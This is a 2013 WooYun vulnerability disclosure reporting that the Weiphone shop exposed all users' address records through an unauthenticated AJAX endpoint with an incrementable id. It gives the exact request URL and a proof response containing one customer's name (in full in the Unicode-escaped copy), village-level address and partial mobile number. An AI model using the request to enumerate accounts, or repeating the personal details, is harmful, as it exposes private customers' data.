当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020067

漏洞标题:威锋商城权限限制不严,导致可以直接爆出所有用户资料

相关厂商:威锋网

漏洞作者: 孤独雪狼

提交时间:2013-03-14 18:50

修复时间:2013-04-28 18:51

公开时间:2013-04-28 18:51

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

- -我很怀疑这个漏洞会有人认领吗?

详细说明:

http://www.fengbuy.com/account/accountInfo/gerAddressByIdAjax/?id=5
修改Id=后面的数字
至于后面能修改到多少我就不清楚了 你们看着办
当然 我不会告诉你这是程序问题

漏洞证明:

jifen.png


{"success":"1","info":{"entity_id":"5","entity_type_id":"2","attribute_set_id":"0","increment_id":"","parent_id":"43","created_at":"2012-01-16 12:08:29","updated_at":"2013-02-28 11:34:16","is_active":"1","prefix":"","firstname":"\u718a\u5efa\u534e","suffix":"","city":"\u957f\u6c99\u5e02","country_id":"CN","region":"\u6e56\u5357\u7701","postcode":"410624","telephone":"","district":"\u5b81\u4e61\u53bf","mobile":"1501941****","region_id":"18","city_id":"177","district_id":"1563","street":"\u6708\u534e\u6751","default_billing":"0","id":"5"}}


部分内容编码了,解开看看:
{"success":"1","info":{"entity_id":"5","entity_type_id":"2","attribute_set_id":"0","increment_id":"","parent_id":"43","created_at":"2012-01-16 12:08:29","updated_at":"2013-02-28 11:34:16","is_active":"1","prefix":"","firstname":"熊**","suffix":"","city":"长沙市","country_id":"CN","region":"湖南省","postcode":"410624","telephone":"","district":"宁乡县","mobile":"1501941****","region_id":"18","city_id":"177","district_id":"1563","street":"月华村","default_billing":"0","id":"5"}}

修复方案:

看漏洞证明,怎么修复你们是专家

版权声明:转载请注明来源 孤独雪狼@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝